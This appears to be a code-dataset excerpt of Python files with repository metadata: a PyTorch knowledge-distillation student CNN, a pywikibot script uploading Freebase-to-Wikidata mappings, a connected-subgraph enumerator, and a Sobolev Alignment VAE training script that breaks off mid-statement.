        if strip:
            return [part.strip() for part in parts]
        return parts
    if isinstance(obj, (list, tuple)):
        return obj
    if obj is None:
        return []
    return [obj]
| 28.133333
| 84
| 0.5391
|
def asbool(obj):
if isinstance(obj, str):
obj = obj.strip().lower()
if obj in ['true', 'yes', 'on', 'y', 't', '1']:
return True
elif obj in ['false', 'no', 'off', 'n', 'f', '0']:
return False
else:
raise ValueError(
"String is not true/false: %r" % obj)
return bool(obj)
def aslist(obj, sep=None, strip=True):
if isinstance(obj, str):
lst = obj.split(sep)
if strip:
lst = [v.strip() for v in lst]
return lst
elif isinstance(obj, (list, tuple)):
return obj
elif obj is None:
return []
else:
return [obj]
| true
| true
|
790c7949e38fea35c440f0cd1ae210a7ab63f104
| 6,169
|
py
|
Python
|
model/studentB.py
|
eungbean/knowledge-distillation-cifar10
|
683379804c8724d097a845cee85f130b6767dbd7
|
[
"MIT"
] | 1
|
2021-02-27T15:13:32.000Z
|
2021-02-27T15:13:32.000Z
|
model/studentB.py
|
eungbean/knowledge-distillation-cifar10
|
683379804c8724d097a845cee85f130b6767dbd7
|
[
"MIT"
] | 9
|
2019-12-16T22:16:55.000Z
|
2021-09-08T01:23:09.000Z
|
model/studentB.py
|
eungbean/knowledge-distillation-cifar10
|
683379804c8724d097a845cee85f130b6767dbd7
|
[
"MIT"
] | null | null | null |
"""
Baseline CNN, losss function and metrics
Also customizes knowledge distillation (KD) loss function here
"""
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
class Flatten(nn.Module):
    """Flatten every dimension except the batch (first) dimension."""

    def forward(self, input):
        # (N, *dims) -> (N, prod(dims))
        batch = input.size(0)
        return input.view(batch, -1)
"""
This is the standard way to define your own network in PyTorch. You typically choose the components
(e.g. LSTMs, linear layers etc.) of your network in the __init__ function. You then apply these layers
on the input step-by-step in the forward function. You can use torch.nn.functional to apply functions
such as F.relu, F.sigmoid, F.softmax, F.max_pool2d. Be careful to ensure your dimensions are correct after each
step. You are encouraged to have a look at the network in pytorch/nlp/model/net.py to get a better sense of how
you can go about defining your own network.
The documentation for all the various components available o you is here: http://pytorch.org/docs/master/nn.html
"""
class studentB(nn.Module):
    def __init__(self, params):
        """
        We define a convolutional network that predicts the sign from an image.

        Architecture: conv1 (3->32) -> [conv2_1/2/3: 32->32->32->64] ->
        [conv3_1/2/3: 64->64->64->128] -> fc1 (2048->500) -> fc2 (500->10),
        with batch norm after each conv stack and 2x2 max-pooling between them.

        Args:
            params: (Params) contains num_channels and dropout_rate
        """
        super(studentB, self).__init__()
        # NOTE(review): stored but unused below -- the layer widths are
        # hard-coded (32/64/128); confirm whether params.num_channels
        # was meant to drive them.
        self.num_channels = params.num_channels
        # each of the convolution layers below have the arguments (input_channels, output_channels, filter_size,
        # stride, padding). We also include batch normalisation layers that help stabilise training.
        # For more details on how to use these layers, check out the documentation.
        self.conv1 = nn.Conv2d(3, 32, 5, stride=1, padding=2)
        self.bn1 = nn.BatchNorm2d(32)
        # Bottleneck-style stack: 1x1 -> 3x3 -> 1x1, expanding 32 -> 64 channels.
        self.conv2_1 = nn.Conv2d(32, 32, 1, stride=1, padding=0)
        self.conv2_2 = nn.Conv2d(32, 32, 3, stride=1, padding=1)
        self.conv2_3 = nn.Conv2d(32, 64, 1, stride=1, padding=0)
        self.bn2 = nn.BatchNorm2d(64)
        # Second bottleneck stack, expanding 64 -> 128 channels.
        self.conv3_1 = nn.Conv2d(64, 64, 1, stride=1, padding=0)
        self.conv3_2 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
        self.conv3_3 = nn.Conv2d(64, 128, 1, stride=1, padding=0)
        self.bn3 = nn.BatchNorm2d(128)
        # 2 fully connected layers to transform the output of the convolution layers to the final output
        self.fc1 = nn.Linear(4*4*128, 500)
        self.fcbn1 = nn.BatchNorm1d(500)
        self.fc2 = nn.Linear(500, 10)
        # Dropout probability applied between fc1 and fc2.
        self.dropout_rate = params.dropout_rate

    def forward(self, s):
        """
        This function defines how we use the components of our network to operate on an input batch.

        Args:
            s: (Variable) contains a batch of images, of dimension batch_size x 3 x 32 x 32 .

        Returns:
            out: (Variable) dimension batch_size x 10 with the logits for the labels of each image.

        Note: the dimensions after each step are provided
        """
        #                                                  -> batch_size x 3 x 32 x 32
        # we apply the convolution layers, followed by batch normalisation, maxpool and relu x 3
        s = self.bn1(self.conv1(s))                        # batch_size x 32 x 32 x 32
        s = F.relu(F.max_pool2d(s, 2))                     # batch_size x 32 x 16 x 16
        s = self.conv2_1(s)
        s = self.conv2_2(s)
        s = self.conv2_3(s)
        s = self.bn2(s)                                    # batch_size x 64 x 16 x 16
        s = F.relu(F.max_pool2d(s, 2))                     # batch_size x 64 x 8 x 8
        s = self.conv3_1(s)
        s = self.conv3_2(s)
        s = self.conv3_3(s)
        s = self.bn3(s)                                    # batch_size x 128 x 8 x 8
        s = F.relu(F.max_pool2d(s, 2))                     # batch_size x 128 x 4 x 4
        # flatten the output for each image
        s = s.view(-1, 4*4*128)                            # batch_size x 2048
        # apply 2 fully connected layers with dropout
        s = F.dropout(F.relu(self.fcbn1(self.fc1(s))),
                      p=self.dropout_rate, training=self.training)  # batch_size x 500
        s = self.fc2(s)                                    # batch_size x 10
        return s
def loss_fn(outputs, labels):
    """
    Compute the mean cross entropy loss given outputs and labels.
    Args:
        outputs: (Variable) dimension batch_size x num_classes - raw logits from the model
        labels: (Variable) dimension batch_size, each element a class index in [0, num_classes)
    Returns:
        loss (Variable): scalar cross entropy loss averaged over the batch
    Note: you may use a standard loss function from http://pytorch.org/docs/master/nn.html#loss-functions.
    """
    # F.cross_entropy is the functional form of nn.CrossEntropyLoss and avoids
    # constructing a fresh criterion module object on every call.
    return F.cross_entropy(outputs, labels)
def loss_fn_kd(outputs, labels, teacher_outputs, params):
    """
    Compute the knowledge-distillation (KD) loss given outputs and labels.
    "Hyperparameters": temperature and alpha (read from params).
    The loss is alpha*T*T * KL(student_soft || teacher_soft) + (1-alpha) * CE(outputs, labels).
    NOTE: the KL Divergence for PyTorch comparing the softmaxs of teacher
    and student expects the input tensor to be log probabilities! See Issue #2
    """
    alpha = params.alpha
    temp = params.temperature
    # Temperature-softened distributions: student in log space, teacher in prob space.
    soft_student = F.log_softmax(outputs / temp, dim=1)
    soft_teacher = F.softmax(teacher_outputs / temp, dim=1)
    # nn.KLDivLoss() default reduction is 'mean' (mean over all elements),
    # matching the original behavior; T^2 rescales the softened gradient.
    distillation_term = nn.KLDivLoss()(soft_student, soft_teacher) * (alpha * temp * temp)
    supervised_term = F.cross_entropy(outputs, labels) * (1. - alpha)
    return distillation_term + supervised_term
def accuracy(outputs, labels):
    """
    Compute the fraction of correctly classified images.
    Args:
        outputs: (np.ndarray) batch_size x num_classes model scores
        labels: (np.ndarray) batch_size true class indices in [0, num_classes-1]
    Returns: (float) accuracy in [0,1]
    """
    predictions = np.argmax(outputs, axis=1)
    # mean of the boolean hit mask == hits / labels.size
    return (predictions == labels).mean()
# maintain all metrics required in this dictionary- these are used in the training and evaluation loops
# Each entry maps a metric name to a function f(outputs, labels) -> scalar,
# where outputs/labels are numpy arrays (see `accuracy` above).
metrics = {
    'accuracy': accuracy,
    # could add more metrics such as accuracy for each token type
}
| 40.058442
| 119
| 0.625385
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
class Flatten(nn.Module):
    """Collapse every dimension after the batch dimension into one."""
    def forward(self, input):
        # keep the batch size, merge all remaining dims into a single one
        batch_size = input.size(0)
        return input.view(batch_size, -1)
class studentB(nn.Module):
    """
    Student CNN for 3 x 32 x 32 image batches.

    Three conv stages (each a 1x1 -> 3x3 -> 1x1 conv stack followed by batch
    norm, max-pool and ReLU) feed two fully connected layers producing 10
    class logits.
    """
    def __init__(self, params):
        """
        Args:
            params: hyperparameter object; must provide `num_channels` and
                `dropout_rate` attributes.
        """
        super(studentB, self).__init__()
        # NOTE(review): stored but the layer widths below are hard-coded;
        # confirm whether num_channels is still meant to drive them.
        self.num_channels = params.num_channels
        self.conv1 = nn.Conv2d(3, 32, 5, stride=1, padding=2)
        self.bn1 = nn.BatchNorm2d(32)
        self.conv2_1 = nn.Conv2d(32, 32, 1, stride=1, padding=0)
        self.conv2_2 = nn.Conv2d(32, 32, 3, stride=1, padding=1)
        self.conv2_3 = nn.Conv2d(32, 64, 1, stride=1, padding=0)
        self.bn2 = nn.BatchNorm2d(64)
        self.conv3_1 = nn.Conv2d(64, 64, 1, stride=1, padding=0)
        self.conv3_2 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
        self.conv3_3 = nn.Conv2d(64, 128, 1, stride=1, padding=0)
        self.bn3 = nn.BatchNorm2d(128)
        # two fully connected layers mapping the 4x4x128 feature map to 10 logits
        self.fc1 = nn.Linear(4*4*128, 500)
        self.fcbn1 = nn.BatchNorm1d(500)
        self.fc2 = nn.Linear(500, 10)
        self.dropout_rate = params.dropout_rate
    def forward(self, s):
        """Return batch_size x 10 class logits for a batch of 3x32x32 images."""
        s = self.bn1(self.conv1(s))          # batch_size x 32 x 32 x 32
        s = F.relu(F.max_pool2d(s, 2))       # batch_size x 32 x 16 x 16
        s = self.conv2_1(s)
        s = self.conv2_2(s)
        s = self.conv2_3(s)
        s = self.bn2(s)                      # batch_size x 64 x 16 x 16
        s = F.relu(F.max_pool2d(s, 2))       # batch_size x 64 x 8 x 8
        s = self.conv3_1(s)
        s = self.conv3_2(s)
        s = self.conv3_3(s)
        s = self.bn3(s)                      # batch_size x 128 x 8 x 8
        s = F.relu(F.max_pool2d(s, 2))       # batch_size x 128 x 4 x 4
        s = s.view(-1, 4*4*128)              # flatten to batch_size x 2048
        s = F.dropout(F.relu(self.fcbn1(self.fc1(s))),
            p=self.dropout_rate, training=self.training)
        s = self.fc2(s)                      # batch_size x 10 logits
        return s
def loss_fn(outputs, labels):
    """Mean cross-entropy loss over the batch (expects raw logits)."""
    return nn.CrossEntropyLoss()(outputs, labels)
def loss_fn_kd(outputs, labels, teacher_outputs, params):
    """Knowledge-distillation loss: alpha*T^2-weighted KL between temperature-softened
    student/teacher distributions plus (1-alpha)-weighted cross entropy."""
    alpha = params.alpha
    T = params.temperature
    # NOTE(review): nn.KLDivLoss() defaults to reduction='mean' (mean over all
    # elements, not per-sample 'batchmean'); confirm this scaling is intended.
    KD_loss = nn.KLDivLoss()(F.log_softmax(outputs/T, dim=1),
                             F.softmax(teacher_outputs/T, dim=1)) * (alpha * T * T) + \
              F.cross_entropy(outputs, labels) * (1. - alpha)
    return KD_loss
def accuracy(outputs, labels):
    """Fraction of rows where the argmax prediction equals the label."""
    predicted = np.argmax(outputs, axis=1)
    hits = np.sum(predicted == labels)
    return hits / float(labels.size)
metrics = {
    # metric name -> function(outputs, labels) used by the train/eval loops
    'accuracy': accuracy,
}
| true
| true
|
790c795137c30a0537925494d86f409b70e93998
| 4,148
|
py
|
Python
|
scripts/freebasemappingupload.py
|
notconfusing/pywikibot-fr-welcome-bot
|
6e07b7e74166a47c9425816e79786308df369ac2
|
[
"MIT"
] | 1
|
2020-01-03T11:52:01.000Z
|
2020-01-03T11:52:01.000Z
|
scripts/freebasemappingupload.py
|
notconfusing/pywikibot-fr-welcome-bot
|
6e07b7e74166a47c9425816e79786308df369ac2
|
[
"MIT"
] | 2
|
2019-11-07T13:46:32.000Z
|
2019-11-07T14:20:53.000Z
|
scripts/freebasemappingupload.py
|
notconfusing/pywikibot-fr-welcome-bot
|
6e07b7e74166a47c9425816e79786308df369ac2
|
[
"MIT"
] | 1
|
2020-04-14T14:52:24.000Z
|
2020-04-14T14:52:24.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Script to upload the mappings of Freebase to Wikidata.
Can be easily adapted to upload other String identifiers as well
This bot needs the dump from
https://developers.google.com/freebase/data#freebase-wikidata-mappings
The script takes a single parameter:
-filename: the filename to read the freebase-wikidata mappings from;
default: fb2w.nt.gz
"""
#
# (C) Denny Vrandecic, 2013
# (C) Pywikibot team, 2013-2018
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
import gzip
import os
import sys
import pywikibot
class FreebaseMapperRobot(object):

    """Freebase Mapping bot.

    Reads an fb2w N-Triples dump and, for each `mid owl:sameAs qid .` triple,
    adds (or checks) the Freebase-identifier claim (P646) on the Wikidata item.
    """

    def __init__(self, filename):
        """Initializer: connect to Wikidata and remember the dump path (exit if missing)."""
        self.repo = pywikibot.Site('wikidata', 'wikidata').data_repository()
        self.filename = filename
        if not os.path.exists(self.filename):
            pywikibot.output('Cannot find %s. Try providing the absolute path.'
                             % self.filename)
            sys.exit(1)

    def run(self):
        """Run the bot."""
        # Set up some items we will use a lot.
        self.claim = pywikibot.Claim(self.repo, 'P646')  # freebase mapping
        # And sources!
        self.statedin = pywikibot.Claim(self.repo, 'P248')  # stated in
        # Freebase data dump
        freebasedumpitem = pywikibot.ItemPage(self.repo, 'Q15241312')
        self.statedin.setTarget(freebasedumpitem)
        # date of publication
        self.dateofpub = pywikibot.Claim(self.repo, 'P577')
        oct28 = pywikibot.WbTime(site=self.repo, year=2013, month=10, day=28,
                                 precision='day')
        self.dateofpub.setTarget(oct28)

        for line in gzip.open(self.filename):
            # gzip.open defaults to binary mode: on Python 3 each line is bytes,
            # while processLine compares against str. Decode so both versions
            # hand text downstream (on Python 2 this yields unicode).
            self.processLine(line.decode('utf-8').strip())

    def processLine(self, line):
        """Process a single N-Triples line; silently skip anything malformed."""
        if not line or line.startswith('#'):
            return
        mid, sameas, qid, dot = line.split()
        if sameas != '<https://www.w3.org/2002/07/owl#sameAs>':
            return
        if dot != '.':
            return
        if not mid.startswith('<https://rdf.freebase.com/ns/m'):
            return
        # '<https://rdf.freebase.com/ns/m.XXXX>' -> '/m/XXXX'.
        # Slice by the prefix length (31 chars through 'm.'); the previous
        # hard-coded [30:-1] left the dot in, an off-by-one from the http->https
        # URL rewrite.
        mid = '/m/' + mid[len('<https://rdf.freebase.com/ns/m.'):-1]
        if not qid.startswith('<https://www.wikidata.org/entity/Q'):
            return
        # '<https://www.wikidata.org/entity/Q123>' -> 'Q123'. The previous
        # [33:-1] duplicated the 'Q' ('QQ123') because 'Q' sits at index 33 of
        # this 34-char https prefix.
        qid = 'Q' + qid[len('<https://www.wikidata.org/entity/Q'):-1]
        data = pywikibot.ItemPage(self.repo, qid)
        data.get()
        if not data.labels:
            label = ''
        elif 'en' in data.labels:
            label = data.labels['en']
        else:
            # Just pick up the first label
            label = list(data.labels.values())[0]
        pywikibot.output('Parsed: {} <--> {}'.format(qid, mid))
        pywikibot.output('{} is {}'.format(data.getID(), label))
        if data.claims and 'P646' in data.claims:
            # We assume that there is only one claim.
            # If there are multiple ones, our logs might be wrong
            # but the constraint value reports will catch them
            if mid != data.claims['P646'][0].getTarget():
                pywikibot.output('Mismatch: expected {}, has {} instead'
                                 .format(mid,
                                         data.claims['P646'][0].getTarget()))
            else:
                pywikibot.output('Already has mid set, is consistent.')
        else:
            # No claim set, lets add it.
            pywikibot.output('Going to add a new claim.')
            self.claim.setTarget(mid)
            data.addClaim(self.claim)
            self.claim.addSources([self.statedin, self.dateofpub])
            pywikibot.output('Claim added!')
def main(*args):
    """
    Process command line arguments and invoke bot.
    If args is an empty list, sys.argv is used.
    @param args: command line arguments
    @type args: str
    """
    filename = 'fb2w.nt.gz'  # Default filename
    for arg in pywikibot.handle_args(args):
        if arg.startswith('-filename'):
            # pywikibot options take the form '-filename:value'. The prefix
            # '-filename:' is 10 characters, so the old arg[11:] dropped the
            # first character of the value; slice by the prefix length instead.
            filename = arg[len('-filename:'):]
    bot = FreebaseMapperRobot(filename)
    bot.run()
if __name__ == '__main__':
main()
| 32.920635
| 79
| 0.583173
|
from __future__ import absolute_import, division, unicode_literals
import gzip
import os
import sys
import pywikibot
class FreebaseMapperRobot(object):
    """Uploads Freebase-mid (P646) mappings from an fb2w N-Triples dump to Wikidata."""
    def __init__(self, filename):
        """Connect to the Wikidata repository and remember the dump path; exit if missing."""
        self.repo = pywikibot.Site('wikidata', 'wikidata').data_repository()
        self.filename = filename
        if not os.path.exists(self.filename):
            pywikibot.output('Cannot find %s. Try providing the absolute path.'
                             % self.filename)
            sys.exit(1)
    def run(self):
        """Prepare the reusable claim/source objects and process every dump line."""
        self.claim = pywikibot.Claim(self.repo, 'P646')  # Freebase identifier property
        self.statedin = pywikibot.Claim(self.repo, 'P248')  # "stated in" source
        freebasedumpitem = pywikibot.ItemPage(self.repo, 'Q15241312')  # Freebase data dump item
        self.statedin.setTarget(freebasedumpitem)
        self.dateofpub = pywikibot.Claim(self.repo, 'P577')  # date of publication
        oct28 = pywikibot.WbTime(site=self.repo, year=2013, month=10, day=28,
                                 precision='day')
        self.dateofpub.setTarget(oct28)
        # NOTE(review): gzip.open defaults to binary mode, so on Python 3 each
        # line is bytes while processLine compares against str — confirm the
        # intended Python version or decode here.
        for line in gzip.open(self.filename):
            self.processLine(line.strip())
    def processLine(self, line):
        """Parse one `mid sameAs qid .` triple and add/check the P646 claim."""
        if not line or line.startswith('#'):
            return
        mid, sameas, qid, dot = line.split()
        if sameas != '<https://www.w3.org/2002/07/owl#sameAs>':
            return
        if dot != '.':
            return
        if not mid.startswith('<https://rdf.freebase.com/ns/m'):
            return
        # NOTE(review): with this https URL the prefix through 'm.' is 31 chars,
        # so [30:-1] keeps the leading dot — looks off by one; verify.
        mid = '/m/' + mid[30:-1]
        if not qid.startswith('<https://www.wikidata.org/entity/Q'):
            return
        # NOTE(review): 'Q' sits at index 33 of this https prefix, so this
        # appears to yield 'QQ…' — verify the slice offset.
        qid = 'Q' + qid[33:-1]
        data = pywikibot.ItemPage(self.repo, qid)
        data.get()
        if not data.labels:
            label = ''
        elif 'en' in data.labels:
            label = data.labels['en']
        else:
            # fall back to an arbitrary available language label
            label = list(data.labels.values())[0]
        pywikibot.output('Parsed: {} <--> {}'.format(qid, mid))
        pywikibot.output('{} is {}'.format(data.getID(), label))
        if data.claims and 'P646' in data.claims:
            # assumes at most one existing P646 claim; extras are only caught
            # by constraint reports
            if mid != data.claims['P646'][0].getTarget():
                pywikibot.output('Mismatch: expected {}, has {} instead'
                                 .format(mid,
                                         data.claims['P646'][0].getTarget()))
            else:
                pywikibot.output('Already has mid set, is consistent.')
        else:
            # no existing claim: add one, sourced to the Freebase dump item
            pywikibot.output('Going to add a new claim.')
            self.claim.setTarget(mid)
            data.addClaim(self.claim)
            self.claim.addSources([self.statedin, self.dateofpub])
            pywikibot.output('Claim added!')
def main(*args):
    """Process command line arguments and invoke the bot (sys.argv when args is empty)."""
    filename = 'fb2w.nt.gz'  # default dump filename
    for arg in pywikibot.handle_args(args):
        if arg.startswith('-filename'):
            # NOTE(review): '-filename:' is 10 characters, so [11:] drops the
            # first character of the value — verify the expected argument format.
            filename = arg[11:]
    bot = FreebaseMapperRobot(filename)
    bot.run()
if __name__ == '__main__':
main()
| true
| true
|
790c7a0c2a88b22dd3182e9569eb81e432c95c8f
| 4,590
|
py
|
Python
|
hsst/utility/dfs_subgraph_enumeration.py
|
matichorvat/hsst
|
9804892aa8cf2a226a3e406451fa4ecdbc7338cc
|
[
"MIT"
] | null | null | null |
hsst/utility/dfs_subgraph_enumeration.py
|
matichorvat/hsst
|
9804892aa8cf2a226a3e406451fa4ecdbc7338cc
|
[
"MIT"
] | null | null | null |
hsst/utility/dfs_subgraph_enumeration.py
|
matichorvat/hsst
|
9804892aa8cf2a226a3e406451fa4ecdbc7338cc
|
[
"MIT"
] | null | null | null |
from collections import defaultdict
from hsst.utility import search
from hsst.utility.graph import SemanticGraph
class SubgraphEnumeration(object):
    """
    Search-state object that enumerates all connected subgraphs of a graph.

    Driven by a depth-first search (see enumerate_dfs_subgraphs): the driver
    repeatedly calls generate_moves(), move(), and undo_move(). Every state
    reached is recorded in self.subgraphs as a (node_set, edge_set) pair.
    """

    def __init__(self, graph, node_set_size_limit=0):
        """
        Args:
            graph: object exposing `nodes` and `edges` sets; each edge has
                `from_node`/`to_node`, each node a sortable `node_id`.
            node_set_size_limit: maximum subgraph node count; 0 means unlimited.
        """
        self.full_node_set = graph.nodes
        self.full_edge_set = graph.edges
        self.current_node_set = set()
        self.current_edge_set = set()
        self.visited_states = set()
        self.subgraphs = []
        self.node_set_size_limit = node_set_size_limit

        # Fast lookup structures: directional adjacency plus parallel-edge labels.
        self.edges_by_source = defaultdict(set)
        self.edges_by_destination = defaultdict(set)
        self.edges_by_both = defaultdict(set)  # undirected adjacency (not used below; kept for callers)
        self.labels = defaultdict(list)
        for edge in self.full_edge_set:
            self.labels[(edge.from_node, edge.to_node)].append(edge)
            self.edges_by_source[edge.from_node].add(edge.to_node)
            self.edges_by_destination[edge.to_node].add(edge.from_node)
            self.edges_by_both[edge.from_node].add(edge.to_node)
            self.edges_by_both[edge.to_node].add(edge.from_node)

    def generate_moves(self):
        """
        Return all legal moves from the current state.

        A move is (node, edge_set): a node not yet in the subgraph plus every
        edge linking it to the current node set, so each extension stays
        connected. From the empty state every node is a seed move.
        """
        # Respect the size limit (0 disables it).
        if 0 < self.node_set_size_limit <= len(self.current_node_set):
            return []
        # Initial step: any node can start a subgraph, with no connecting edges.
        if not self.current_node_set:
            return [(node, set()) for node in self.full_node_set]
        moves = []
        for candidate in self.full_node_set - self.current_node_set:
            # Nodes of the current set the candidate points to / is pointed from.
            outgoing = self.edges_by_source[candidate] & self.current_node_set
            incoming = self.edges_by_destination[candidate] & self.current_node_set
            if not (outgoing or incoming):
                continue  # adding the candidate would break connectivity
            # Skip node sets already explored via a different move order.
            if self.id(node=candidate) in self.visited_states:
                continue
            # All edges (including parallel labels) joining the candidate to
            # the current node set, in either direction.
            edges = set(
                edge for src in incoming for edge in self.labels[(src, candidate)]) | \
                set(edge for dst in outgoing for edge in
                    self.labels[(candidate, dst)])
            moves.append((candidate, edges))
        return moves

    def move(self, move):
        """Apply a (node, edge_set) move: grow the subgraph and record the state."""
        node, edge_set = move
        self.current_node_set.add(node)
        self.current_edge_set |= edge_set
        self.visited_states.add(self.id())
        self.subgraphs.append((self.current_node_set.copy(), self.current_edge_set.copy()))

    def undo_move(self, move):
        """Revert a (node, edge_set) move; visited_states is deliberately kept."""
        node, edge_set = move
        self.current_node_set.remove(node)
        self.current_edge_set -= edge_set

    def solved(self):
        """Never 'solved': the driver exhausts the whole search space."""
        return False

    def id(self, node=None):
        """Canonical state key: node reprs sorted by node_id, optionally with `node` added."""
        if node:
            return " ".join(str(x) for x in sorted(self.current_node_set | {node}, key=lambda x: x.node_id))
        return " ".join(str(x) for x in sorted(self.current_node_set, key=lambda x: x.node_id))
def enumerate_dfs_subgraphs(graph, df_limit=100):
    """Enumerate all connected subgraphs of `graph` with at most `df_limit` nodes.

    Runs a depth-first search over SubgraphEnumeration states and wraps each
    recorded (nodes, edges) pair in a SemanticGraph.
    """
    state = SubgraphEnumeration(graph, node_set_size_limit=df_limit)
    search.df(state, df_limit)
    return {SemanticGraph(node_set, edge_set, nonterminal_count=0)
            for node_set, edge_set in state.subgraphs}
| 38.898305
| 115
| 0.652505
|
from collections import defaultdict
from hsst.utility import search
from hsst.utility.graph import SemanticGraph
class SubgraphEnumeration(object):
    """DFS search state enumerating all connected subgraphs of a graph."""
    def __init__(self, graph, node_set_size_limit=0):
        """Build adjacency/label lookups; node_set_size_limit of 0 means unlimited."""
        self.full_node_set = graph.nodes
        self.full_edge_set = graph.edges
        self.current_node_set = set()
        self.current_edge_set = set()
        self.visited_states = set()
        self.subgraphs = []
        self.node_set_size_limit = node_set_size_limit
        # fast lookups: directional adjacency plus parallel-edge label lists
        self.edges_by_source = defaultdict(set)
        self.edges_by_destination = defaultdict(set)
        self.edges_by_both = defaultdict(set)
        self.labels = defaultdict(list)
        for edge in self.full_edge_set:
            self.labels[(edge.from_node, edge.to_node)].append(edge)
            self.edges_by_source[edge.from_node].add(edge.to_node)
            self.edges_by_destination[edge.to_node].add(edge.from_node)
            self.edges_by_both[edge.from_node].add(edge.to_node)
            self.edges_by_both[edge.to_node].add(edge.from_node)
    def generate_moves(self):
        """Return (node, connecting_edges) moves that keep the subgraph connected."""
        moves = []
        temporary_moves = {}
        # stop growing once the size limit is reached (0 disables the limit)
        if 0 < self.node_set_size_limit <= len(self.current_node_set):
            return moves
        # initial step: every node can seed a subgraph with no edges
        if not self.current_node_set:
            for node in self.full_node_set:
                moves.append((node, set()))
            return moves
        possible_nodes = self.full_node_set - self.current_node_set
        for possible_node in possible_nodes:
            destination_nodes = self.edges_by_source[possible_node] & self.current_node_set
            source_nodes = self.edges_by_destination[possible_node] & self.current_node_set
            if len(destination_nodes) > 0 or len(source_nodes) > 0:
                # skip node sets already reached via another move order
                if self.id(node=possible_node) in self.visited_states:
                    continue
                # every edge (all parallel labels) joining the candidate to the
                # current node set, in either direction
                edges = set(
                    edge for source_node in source_nodes for edge in self.labels[(source_node, possible_node)]) | \
                    set(edge for destination_node in destination_nodes for edge in
                        self.labels[(possible_node, destination_node)])
                temporary_moves[possible_node] = edges
        for move in temporary_moves:
            moves.append((move, temporary_moves[move]))
        return moves
    def move(self, move):
        """Apply a (node, edge_set) move: grow the subgraph and record the state."""
        node, edge_set = move
        self.current_node_set.add(node)
        self.current_edge_set |= edge_set
        self.visited_states.add(self.id())
        self.subgraphs.append((self.current_node_set.copy(), self.current_edge_set.copy()))
    def undo_move(self, move):
        """Revert a (node, edge_set) move; visited_states is deliberately kept."""
        node, edge_set = move
        self.current_node_set.remove(node)
        self.current_edge_set -= edge_set
    def solved(self):
        """Never 'solved': the DFS driver exhausts the whole search space."""
        return False
    def id(self, node=None):
        """Canonical state key: node reprs sorted by node_id, optionally with `node` added."""
        if node:
            return " ".join(str(x) for x in sorted(self.current_node_set | {node}, key=lambda x: x.node_id))
        else:
            return " ".join(str(x) for x in sorted(self.current_node_set, key=lambda x: x.node_id))
def enumerate_dfs_subgraphs(graph, df_limit=100):
    """Enumerate all connected subgraphs of `graph` (up to `df_limit` nodes) as SemanticGraphs."""
    enumeration = SubgraphEnumeration(graph, node_set_size_limit=df_limit)
    search.df(enumeration, df_limit)
    return set(SemanticGraph(nodes, edges, nonterminal_count=0) for nodes, edges in enumeration.subgraphs)
| true
| true
|
790c7a1b4c501fb03fc116411c54360745164692
| 2,803
|
py
|
Python
|
figure_3/model_III/sobolev_alignment/train_VAE.py
|
saroudant/sobolev_alignment_manuscript
|
2b4d7ce4bbdac3a32ad8c02b950b4d1c91cda193
|
[
"MIT"
] | null | null | null |
figure_3/model_III/sobolev_alignment/train_VAE.py
|
saroudant/sobolev_alignment_manuscript
|
2b4d7ce4bbdac3a32ad8c02b950b4d1c91cda193
|
[
"MIT"
] | null | null | null |
figure_3/model_III/sobolev_alignment/train_VAE.py
|
saroudant/sobolev_alignment_manuscript
|
2b4d7ce4bbdac3a32ad8c02b950b4d1c91cda193
|
[
"MIT"
] | null | null | null |
"""
This script:
- Train Sobolev Alignment.
- Save the two networks.
"""
import os, sys, getopt
import pandas as pd
import numpy as np
import re
from anndata import AnnData
import torch
from pickle import dump, load
from copy import deepcopy
import gc
from sobolev_alignment import SobolevAlignment
# Import params
from model_III_synthetic_params import *
from read_data import read_data
# Import parameters
# Parse CLI options: -o output dir, -d data subfolder, -n artificial sample
# count, -t temp/mmap dir, -j parallel jobs. (-p is declared but unused here.)
n_artificial_samples = None
tmp_file = None
opts, args = getopt.getopt(sys.argv[1:],'o:d:n:t:j:p:',['output=', 'data=', 'artifsamples=', 'temp=', 'job=', 'perm='])
for opt, arg in opts:
    if opt in ("-o", "--output"):
        output_folder = str(arg)
    elif opt in ("-d", "--data"):
        data_subfolder = str(arg)
    elif opt in ('-n', '--artifsamples'):
        n_artificial_samples = int(arg)
    elif opt in ('-t', '--temp'):
        tmp_file = str(arg)
    elif opt in ('-j', '--job'):
        n_jobs = int(arg)
# NOTE(review): output_folder / data_subfolder / n_jobs stay undefined when the
# corresponding flag is absent — confirm all flags are mandatory in practice.
n_artificial_samples = n_artificial_samples if n_artificial_samples is not None else 10**6
n_artificial_samples = int(n_artificial_samples)
tmp_file = tmp_file if tmp_file is not None else '/tmp/SM/'
###
# IMPORT DATA
###
# data_folder presumably comes from the model_III_synthetic_params star import.
X_source, X_target = read_data(data_folder, data_subfolder)
gc.collect()
###
# Sobolev Alignment start
###
# Read best parameters
cell_line_scvi_params, tumor_scvi_params = read_scvi_params(output_folder)
sobolev_alignment_clf = SobolevAlignment(
    source_scvi_params=cell_line_scvi_params,
    target_scvi_params=tumor_scvi_params,
    source_krr_params=default_krr_params,
    target_krr_params=default_krr_params,
    n_jobs=n_jobs
)
###
# Training Sobolev Alignment if not already saved.
###
# Exit early when a trained model already exists in the output folder.
if 'sobolev_alignment_model' not in os.listdir(output_folder):
    pass
else:
    sys.exit("VAE ALREADY TRAINED")
sobolev_alignment_clf.n_jobs = n_jobs
# Train only the VAEs (fit_vae=True, krr_approx=False); artificial sampling is
# deferred to a later stage of the pipeline.
sobolev_alignment_clf.fit(
    X_source=X_source,
    X_target=X_target,
    source_batch_name=batch_name,
    target_batch_name=batch_name,
    continuous_covariate_names=continuous_covariate_names,
    n_artificial_samples=100,
    fit_vae=True,
    sample_artificial=False,
    krr_approx=False,
    n_samples_per_sample_batch=10**6,
    frac_save_artificial=1.,
    save_mmap=tmp_file,
    log_input=log_input,
    no_posterior_collapse=no_posterior_collapse,
    frob_norm_source=frob_norm_source
)
# Persist the VAEs only (with_krr=False); re-checked to avoid overwriting.
if 'sobolev_alignment_model' not in os.listdir(output_folder):
    sobolev_alignment_clf.save('%s/sobolev_alignment_model/'%(output_folder), with_krr=False)
gc.collect()
# Save embedding
for x in sobolev_alignment_clf.scvi_models:
    np.savetxt(
        '%s/scvi_embedding_%s.csv'%(output_folder, x),
